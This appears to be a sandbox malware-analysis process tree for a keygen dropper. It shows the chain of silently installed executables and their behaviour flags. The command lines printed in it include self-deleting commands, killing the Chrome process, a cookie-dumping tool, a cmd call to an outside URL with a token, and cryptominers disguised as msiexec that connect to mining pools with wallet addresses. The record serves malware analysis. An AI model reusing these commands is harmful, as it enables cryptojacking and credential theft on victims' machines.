C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat5⤵
- Executes dropped EXE
PID:4436
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
PID:1832
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3048 -
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:4420 -
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
PID:2572
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:676 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4364 -
C:\Users\Admin\AppData\Local\Temp\4SC8JT0GSI\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\4SC8JT0GSI\multitimer.exe" 0 3060197d33d91c80.94013368 0 1015⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3080 -
C:\Users\Admin\AppData\Local\Temp\4SC8JT0GSI\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\4SC8JT0GSI\multitimer.exe" 1 3.1617397648.60678790bfcfd 1016⤵PID:4080
-
C:\Users\Admin\AppData\Local\Temp\4SC8JT0GSI\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\4SC8JT0GSI\multitimer.exe" 2 3.1617397648.60678790bfcfd7⤵PID:1556
-
C:\Users\Admin\AppData\Local\Temp\0najphquhip\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\0najphquhip\cpyrix.exe" /VERYSILENT8⤵PID:5048
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe9⤵PID:2132
-
C:\Users\Admin\AppData\Roaming\1.exe"{path}"10⤵PID:5852
-
-
C:\Users\Admin\AppData\Roaming\1.exe"{path}"10⤵PID:4128
-
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe9⤵PID:5344
-
C:\Windows\SysWOW64\at.exe"C:\Windows\System32\at.exe"10⤵PID:5988
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Tre.pub10⤵PID:1168
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe11⤵PID:2580
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nopv3ebemh2\IBInstaller_97039.exe"C:\Users\Admin\AppData\Local\Temp\nopv3ebemh2\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq8⤵PID:5220
-
C:\Users\Admin\AppData\Local\Temp\is-D7QF2.tmp\IBInstaller_97039.tmp"C:\Users\Admin\AppData\Local\Temp\is-D7QF2.tmp\IBInstaller_97039.tmp" /SL5="$102F2,12322324,721408,C:\Users\Admin\AppData\Local\Temp\nopv3ebemh2\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq9⤵PID:5464
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://egypthistoricart.online/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=9703910⤵PID:5700
-
-
C:\Users\Admin\AppData\Local\Temp\is-TQ7QF.tmp\{app}\chrome_proxy.exe"C:\Users\Admin\AppData\Local\Temp\is-TQ7QF.tmp\{app}\chrome_proxy.exe"10⤵PID:5720
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-TQ7QF.tmp\{app}\chrome_proxy.exe"11⤵PID:5496
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 412⤵
- Runs ping.exe
PID:376
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\dnxuanf0xur\vpn.exe"C:\Users\Admin\AppData\Local\Temp\dnxuanf0xur\vpn.exe" /silent /subid=4828⤵PID:5212
-
-
C:\Users\Admin\AppData\Local\Temp\1pkth0mvolr\app.exe"C:\Users\Admin\AppData\Local\Temp\1pkth0mvolr\app.exe" /8-238⤵PID:5200
-
C:\Users\Admin\AppData\Local\Temp\1pkth0mvolr\app.exe"C:\Users\Admin\AppData\Local\Temp\1pkth0mvolr\app.exe" /8-239⤵PID:8176
-
-
-
C:\Users\Admin\AppData\Local\Temp\sbsgvepdh2k\hblihcar0lz.exe"C:\Users\Admin\AppData\Local\Temp\sbsgvepdh2k\hblihcar0lz.exe" /VERYSILENT8⤵PID:5188
-
-
C:\Users\Admin\AppData\Local\Temp\r44xabshida\vict.exe"C:\Users\Admin\AppData\Local\Temp\r44xabshida\vict.exe" /VERYSILENT /id=5358⤵PID:5172
-
-
C:\Users\Admin\AppData\Local\Temp\nqppdcr4wmv\fv44gffge1d.exe"C:\Users\Admin\AppData\Local\Temp\nqppdcr4wmv\fv44gffge1d.exe" /ustwo INSTALL8⤵PID:5160
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5160 -s 6529⤵
- Program crash
PID:5656
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5160 -s 6569⤵
- Program crash
PID:6092
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5160 -s 7769⤵
- Program crash
PID:5680
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5160 -s 8129⤵
- Program crash
PID:5248
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5160 -s 8929⤵
- Program crash
PID:4736
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5160 -s 8449⤵
- Program crash
PID:1564
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5160 -s 9729⤵
- Program crash
PID:5324
-
-
-
C:\Users\Admin\AppData\Local\Temp\kmwisrcs3oy\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\kmwisrcs3oy\Setup3310.exe" /Verysilent /subid=5778⤵PID:5152
-
-
C:\Users\Admin\AppData\Local\Temp\po2521ilga5\eavx5xubnca.exe"C:\Users\Admin\AppData\Local\Temp\po2521ilga5\eavx5xubnca.exe"8⤵PID:5140
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\po2521ilga5\eavx5xubnca.exe"9⤵PID:5880
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 300010⤵
- Runs ping.exe
PID:5664
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\lw3lain0om1\KiffApp1.exe"C:\Users\Admin\AppData\Local\Temp\lw3lain0om1\KiffApp1.exe"8⤵PID:5128
-
-
C:\Users\Admin\AppData\Local\Temp\djbz2clvjfe\szz4gefze1f.exe"C:\Users\Admin\AppData\Local\Temp\djbz2clvjfe\szz4gefze1f.exe" /quiet SILENT=1 AF=7568⤵PID:5956
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=756 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\djbz2clvjfe\szz4gefze1f.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\djbz2clvjfe\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1617138565 /quiet SILENT=1 AF=756 " AF="756" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912"9⤵PID:5388
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\VIJG7T740B\setups.exe"C:\Users\Admin\AppData\Local\Temp\VIJG7T740B\setups.exe" ll5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4604 -
C:\Users\Admin\AppData\Local\Temp\is-6LQQU.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-6LQQU.tmp\setups.tmp" /SL5="$401CE,635399,250368,C:\Users\Admin\AppData\Local\Temp\VIJG7T740B\setups.exe" ll6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:208
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"4⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:192 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵
- Suspicious use of WriteProcessMemory
PID:3132 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4456
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Full Program Features.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Full Program Features.exe"4⤵PID:2292
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"5⤵PID:3092
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install6⤵PID:2684
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"4⤵PID:2508
-
C:\Users\Admin\AppData\Roaming\9DEB.tmp.exe"C:\Users\Admin\AppData\Roaming\9DEB.tmp.exe"5⤵PID:2948
-
C:\Users\Admin\AppData\Roaming\9DEB.tmp.exe"C:\Users\Admin\AppData\Roaming\9DEB.tmp.exe"6⤵PID:4036
-
-
-
C:\Users\Admin\AppData\Roaming\A128.tmp.exe"C:\Users\Admin\AppData\Roaming\A128.tmp.exe"5⤵PID:4464
-
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 999996⤵PID:2312
-
-
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 99996⤵PID:5372
-
-
-
C:\Users\Admin\AppData\Roaming\A39A.tmp.exe"C:\Users\Admin\AppData\Roaming\A39A.tmp.exe"5⤵PID:2724
-
C:\Windows\SysWOW64\cmd.exe/c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Roaming\A39A.tmp.exe6⤵PID:5832
-
C:\Windows\SysWOW64\timeout.exetimeout /t 37⤵
- Delays execution with timeout.exe
PID:4372
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"5⤵PID:4396
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
PID:1272
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"4⤵PID:2564
-
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1824
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:1004
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:2116
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:3932
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:2164
-
C:\Users\Admin\AppData\Local\Temp\is-2P64R.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-2P64R.tmp\Setup3310.tmp" /SL5="$102E6,138429,56832,C:\Users\Admin\AppData\Local\Temp\kmwisrcs3oy\Setup3310.exe" /Verysilent /subid=5771⤵PID:5404
-
C:\Users\Admin\AppData\Local\Temp\is-56I5R.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-56I5R.tmp\Setup.exe" /Verysilent2⤵PID:4408
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"3⤵PID:4072
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:2112
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:1296
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"3⤵PID:4536
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4536 -s 9484⤵
- Program crash
PID:6596
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4536 -s 10044⤵
- Program crash
PID:4412
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4536 -s 10164⤵
- Program crash
PID:6796
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4536 -s 11484⤵
- Program crash
PID:6812
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4536 -s 11244⤵
- Program crash
PID:5544
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4536 -s 12044⤵
- Program crash
PID:7128
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4536 -s 15284⤵
- Program crash
PID:3620
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4536 -s 16004⤵
- Program crash
PID:6708
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4536 -s 16804⤵
- Program crash
PID:6680
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4536 -s 16684⤵
- Program crash
PID:8092
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4536 -s 18364⤵
- Program crash
PID:6824
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4536 -s 18524⤵
- Program crash
PID:6856
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4536 -s 17964⤵
- Program crash
PID:7236
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"3⤵PID:4368
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"3⤵PID:4744
-
C:\Users\Admin\AppData\Local\Temp\is-TK0BH.tmp\LabPicV3.tmp"C:\Users\Admin\AppData\Local\Temp\is-TK0BH.tmp\LabPicV3.tmp" /SL5="$20300,239334,155648,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"4⤵PID:3396
-
C:\Users\Admin\AppData\Local\Temp\is-1L8SR.tmp\ppppppfy.exe"C:\Users\Admin\AppData\Local\Temp\is-1L8SR.tmp\ppppppfy.exe" /S /UID=lab2145⤵PID:5304
-
C:\Program Files\Windows Defender\MZMQKNTPIR\prolab.exe"C:\Program Files\Windows Defender\MZMQKNTPIR\prolab.exe" /VERYSILENT6⤵PID:5576
-
C:\Users\Admin\AppData\Local\Temp\is-BI6UA.tmp\prolab.tmp"C:\Users\Admin\AppData\Local\Temp\is-BI6UA.tmp\prolab.tmp" /SL5="$3036A,575243,216576,C:\Program Files\Windows Defender\MZMQKNTPIR\prolab.exe" /VERYSILENT7⤵PID:5368
-
-
-
C:\Users\Admin\AppData\Local\Temp\41-865d1-75b-0ea86-b5120eaee2ed8\Sazhekyquto.exe"C:\Users\Admin\AppData\Local\Temp\41-865d1-75b-0ea86-b5120eaee2ed8\Sazhekyquto.exe"6⤵PID:4880
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exedw20.exe -x -s 11847⤵PID:4592
-
-
-
C:\Users\Admin\AppData\Local\Temp\6b-986f3-5fd-4ef9f-24ed3f67457c1\Mykypapaele.exe"C:\Users\Admin\AppData\Local\Temp\6b-986f3-5fd-4ef9f-24ed3f67457c1\Mykypapaele.exe"6⤵PID:4312
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\x2opqr31.fdm\md6_6ydj.exe & exit7⤵PID:3164
-
C:\Users\Admin\AppData\Local\Temp\x2opqr31.fdm\md6_6ydj.exeC:\Users\Admin\AppData\Local\Temp\x2opqr31.fdm\md6_6ydj.exe8⤵PID:4476
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5xkq2xm2.0kc\askinstall31.exe & exit7⤵PID:4588
-
C:\Users\Admin\AppData\Local\Temp\5xkq2xm2.0kc\askinstall31.exeC:\Users\Admin\AppData\Local\Temp\5xkq2xm2.0kc\askinstall31.exe8⤵PID:5812
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe9⤵PID:7144
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe10⤵
- Kills process with taskkill
PID:6368
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mrxt1xms.dq1\toolspab1.exe & exit7⤵PID:1596
-
C:\Users\Admin\AppData\Local\Temp\mrxt1xms.dq1\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\mrxt1xms.dq1\toolspab1.exe8⤵PID:6152
-
C:\Users\Admin\AppData\Local\Temp\mrxt1xms.dq1\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\mrxt1xms.dq1\toolspab1.exe9⤵PID:6776
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ygl14uz1.2js\setup_10.2_mix.exe & exit7⤵PID:5844
-
C:\Users\Admin\AppData\Local\Temp\ygl14uz1.2js\setup_10.2_mix.exeC:\Users\Admin\AppData\Local\Temp\ygl14uz1.2js\setup_10.2_mix.exe8⤵PID:4416
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\Microsoft\App\app.bat" "9⤵PID:6868
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\aaefbc2c.udn\GcleanerWW.exe /mixone & exit7⤵PID:2128
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\laogbtsn.2rb\app.exe /8-2222 & exit7⤵PID:7008
-
C:\Users\Admin\AppData\Local\Temp\laogbtsn.2rb\app.exeC:\Users\Admin\AppData\Local\Temp\laogbtsn.2rb\app.exe /8-22228⤵PID:4568
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2e0bkgu5.sm2\file.exe & exit7⤵PID:1004
-
C:\Users\Admin\AppData\Local\Temp\2e0bkgu5.sm2\file.exeC:\Users\Admin\AppData\Local\Temp\2e0bkgu5.sm2\file.exe8⤵PID:7268
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"9⤵PID:8088
-
C:\Users\Admin\AppData\Local\Temp\8DF5XYR77K\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\8DF5XYR77K\multitimer.exe" 0 3060197d33d91c80.94013368 0 10110⤵PID:7560
-
C:\Users\Admin\AppData\Local\Temp\8DF5XYR77K\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\8DF5XYR77K\multitimer.exe" 1 3.1617397895.60678887a7414 10111⤵PID:6084
-
C:\Users\Admin\AppData\Local\Temp\8DF5XYR77K\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\8DF5XYR77K\multitimer.exe" 2 3.1617397895.60678887a741412⤵PID:8768
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\BOXQHIWAZW\setups.exe"C:\Users\Admin\AppData\Local\Temp\BOXQHIWAZW\setups.exe" ll10⤵PID:5504
-
C:\Users\Admin\AppData\Local\Temp\is-NDQNI.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-NDQNI.tmp\setups.tmp" /SL5="$20590,635399,250368,C:\Users\Admin\AppData\Local\Temp\BOXQHIWAZW\setups.exe" ll11⤵PID:6656
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"9⤵PID:6756
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe10⤵PID:8316
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe11⤵
- Kills process with taskkill
PID:6640
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"9⤵PID:8340
-
C:\Users\Admin\AppData\Roaming\70CD.tmp.exe"C:\Users\Admin\AppData\Roaming\70CD.tmp.exe"10⤵PID:8256
-
C:\Users\Admin\AppData\Roaming\70CD.tmp.exe"C:\Users\Admin\AppData\Roaming\70CD.tmp.exe"11⤵PID:5488
-
-
-
C:\Users\Admin\AppData\Roaming\928F.tmp.exe"C:\Users\Admin\AppData\Roaming\928F.tmp.exe"10⤵PID:8984
-
-
C:\Users\Admin\AppData\Roaming\AAEA.tmp.exe"C:\Users\Admin\AppData\Roaming\AAEA.tmp.exe"10⤵PID:8676
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"10⤵PID:8832
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"9⤵PID:8508
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\epnenk45.tue\Four.exe & exit7⤵PID:7344
-
C:\Users\Admin\AppData\Local\Temp\epnenk45.tue\Four.exeC:\Users\Admin\AppData\Local\Temp\epnenk45.tue\Four.exe8⤵PID:8152
-
C:\Users\Admin\AppData\Local\Temp\5BHHW1JSCF\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\5BHHW1JSCF\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 1049⤵PID:7624
-
C:\Users\Admin\AppData\Local\Temp\5BHHW1JSCF\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\5BHHW1JSCF\multitimer.exe" 1 3.1617397863.606788677955d 10410⤵PID:7540
-
C:\Users\Admin\AppData\Local\Temp\5BHHW1JSCF\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\5BHHW1JSCF\multitimer.exe" 2 3.1617397863.606788677955d11⤵PID:8912
-
C:\Users\Admin\AppData\Local\Temp\qgmcqpusrzm\4uwiznm2j3s.exe"C:\Users\Admin\AppData\Local\Temp\qgmcqpusrzm\4uwiznm2j3s.exe" /ustwo INSTALL12⤵PID:9048
-
-
C:\Users\Admin\AppData\Local\Temp\q2k10qtrlmw\app.exe"C:\Users\Admin\AppData\Local\Temp\q2k10qtrlmw\app.exe" /8-2312⤵PID:6968
-
-
C:\Users\Admin\AppData\Local\Temp\neyjoy1ziuh\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\neyjoy1ziuh\cpyrix.exe" /VERYSILENT12⤵PID:8424
-
-
C:\Users\Admin\AppData\Local\Temp\cshf5fqk4y0\vict.exe"C:\Users\Admin\AppData\Local\Temp\cshf5fqk4y0\vict.exe" /VERYSILENT /id=53512⤵PID:8420
-
C:\Users\Admin\AppData\Local\Temp\is-3HILS.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-3HILS.tmp\vict.tmp" /SL5="$10702,870426,780800,C:\Users\Admin\AppData\Local\Temp\cshf5fqk4y0\vict.exe" /VERYSILENT /id=53513⤵PID:7456
-
-
-
C:\Users\Admin\AppData\Local\Temp\q3zfxgfoqha\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\q3zfxgfoqha\Setup3310.exe" /Verysilent /subid=57712⤵PID:8772
-
C:\Users\Admin\AppData\Local\Temp\is-5OSSP.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-5OSSP.tmp\Setup3310.tmp" /SL5="$20676,138429,56832,C:\Users\Admin\AppData\Local\Temp\q3zfxgfoqha\Setup3310.exe" /Verysilent /subid=57713⤵PID:2256
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\HRHF7FPQG0\setups.exe"C:\Users\Admin\AppData\Local\Temp\HRHF7FPQG0\setups.exe" ll9⤵PID:7932
-
C:\Users\Admin\AppData\Local\Temp\is-2IREP.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-2IREP.tmp\setups.tmp" /SL5="$30524,635399,250368,C:\Users\Admin\AppData\Local\Temp\HRHF7FPQG0\setups.exe" ll10⤵PID:6260
-
-
-
-
-
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"3⤵PID:4756
-
C:\Users\Admin\AppData\Local\Temp\is-JC310.tmp\lylal220.tmp"C:\Users\Admin\AppData\Local\Temp\is-JC310.tmp\lylal220.tmp" /SL5="$30412,491750,408064,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"4⤵PID:5276
-
C:\Users\Admin\AppData\Local\Temp\is-V3VC6.tmp\Microsoft.exe"C:\Users\Admin\AppData\Local\Temp\is-V3VC6.tmp\Microsoft.exe" /S /UID=lylal2205⤵PID:1196
-
C:\Program Files\Microsoft Office 15\PMGZFYXHTF\irecord.exe"C:\Program Files\Microsoft Office 15\PMGZFYXHTF\irecord.exe" /VERYSILENT6⤵PID:4656
-
C:\Users\Admin\AppData\Local\Temp\is-LB7Q4.tmp\irecord.tmp"C:\Users\Admin\AppData\Local\Temp\is-LB7Q4.tmp\irecord.tmp" /SL5="$7030E,6265333,408064,C:\Program Files\Microsoft Office 15\PMGZFYXHTF\irecord.exe" /VERYSILENT7⤵PID:5604
-
-
-
